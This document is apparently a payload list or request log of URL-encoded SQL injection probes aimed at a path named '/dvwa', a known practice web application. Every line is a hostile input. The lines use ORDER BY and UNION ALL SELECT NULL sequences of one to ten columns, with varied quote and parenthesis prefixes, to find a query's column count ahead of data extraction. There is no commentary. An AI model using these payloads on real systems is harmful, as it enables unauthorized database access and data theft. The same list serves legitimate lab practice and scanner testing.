/dvwa%20UNION%20ALL%20SELECT%20NULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%29%20ORDER%20BY%201%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%20ORDER%20BY%201%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%25%27%20ORDER%20BY%201%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20ORDER%20BY%201%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
